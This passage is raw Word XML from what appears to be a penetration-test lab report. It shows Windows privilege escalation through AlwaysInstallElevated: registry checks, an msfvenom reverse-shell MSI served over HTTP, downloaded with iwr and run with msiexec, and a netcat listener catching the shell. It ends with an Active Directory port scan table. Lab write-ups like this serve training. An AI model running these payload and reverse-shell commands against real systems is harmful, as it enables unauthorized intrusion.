                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t>We can also confirm this vulnerability using manual command as suggested by Microsoft.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t xml:space="preserve">URL: </w:t>
            </w:r>
            <w:hyperlink r:id="rId29" w:tgtFrame="_top">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                  <w:color w:val="0563C1"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated</w:t>
              </w:r>
            </w:hyperlink>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 xml:space="preserve">PS C:\Users\shenzi\Desktop&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="C9211E"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer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reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer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HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer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color w:val="C9211E"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>AlwaysInstallElevated    REG_DWORD    0x1</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PS C:\Users\shenzi\Desktop&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="C9211E"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer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reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer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sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer</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before="0" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="C9211E"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>AlwaysInstallElevated    REG_DWORD    0x1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t>We’ll generate .msi payload and transfer it to execute on target machine to get elevated shell.</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msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=445 -f msi &gt; notavirus.msi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="732790"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="25" name="Image2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25" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="732790"/>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python -m http.server 80</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="536575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="26" name="Image2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26" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId31"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="536575"/>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iwr http://192.168.45.154/notavirus.msi -o notavirus.msi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="342265"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="27" name="Image2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27" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="342265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>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PS C:\Users\shenzi\Desktop&gt; msiexec /i notavirus.msi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="33">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5613400" cy="750570"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="28" name="Image31"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1" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="750570"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>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sudo nc -lvnp 445</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="32">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5613400" cy="1478915"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="29" name="Image3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30" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="1478915"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="60" w:name="__RefHeading___Toc5504_4118114545"/>
            <w:bookmarkEnd w:id="60"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Post Exploitation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proof.txt value:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:pBdr>
                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:fill="D9D9D9"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>c:\Users\Administrator\Desktop&gt; whoami &amp;&amp; ipconfig &amp;&amp; type proof.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="30">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5613400" cy="2216785"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="30" name="Image32"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32" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="2216785"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="354" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:start w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:end w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11234" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:start w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:end w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="240"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="61" w:name="__RefHeading___Toc5471_4118114545"/>
            <w:bookmarkStart w:id="62" w:name="_Toc92992249"/>
            <w:bookmarkStart w:id="63" w:name="_Toc151462881"/>
            <w:bookmarkEnd w:id="61"/>
            <w:r>
              <w:rPr/>
              <w:t>Active Directory Set</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62"/>
            <w:bookmarkEnd w:id="63"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="240"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Port Scan Results</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9350" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="0" w:type="dxa"/>
                <w:start w:w="5" w:type="dxa"/>
                <w:bottom w:w="0" w:type="dxa"/>
                <w:end w:w="5" w:type="dxa"/>
              </w:tblCellMar>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2515"/>
              <w:gridCol w:w="6834"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2515" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:spacing w:lineRule="auto" w:line="360" w:before="240" w:after="240"/>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>IP Address</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6834" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:spacing w:lineRule="auto" w:line="360" w:before="240" w:after="0"/>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Ports Open</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2515" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:spacing w:lineRule="auto" w:line="360"/>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>10.4.4.10</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6834" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:spacing w:lineRule="auto" w:line="360"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="DefaultParagraphFont"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>TCP:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="DefaultParagraphFont"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 22, 80</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2515" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:spacing w:lineRule="auto" w:line="360"/>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>10.5.5.20</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6834" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:spacing w:lineRule="auto" w:line="360"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="DefaultParagraphFont"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>TCP:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="DefaultParagraphFont"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 135, 139, 445, 3389</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2515" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:spacing w:lineRule="auto" w:line="360"/>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>10.5.5.30</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6834" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:spacing w:lineRule="auto" w:line="360"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="DefaultParagraphFont"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>TCP:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="DefaultParagraphFont"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="64" w:name="__RefHeading___Toc5473_4118114545"/>
            <w:bookmarkStart w:id="65" w:name="_Toc92992250"/>
            <w:bookmarkStart w:id="66" w:name="_Toc151462882"/>
            <w:bookmarkEnd w:id="64"/>
            <w:r>
              <w:rPr/>
              <w:t>Ajla – 10.4.4.10</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65"/>
            <w:bookmarkEnd w:id="66"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="240"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
            </w:pPr>
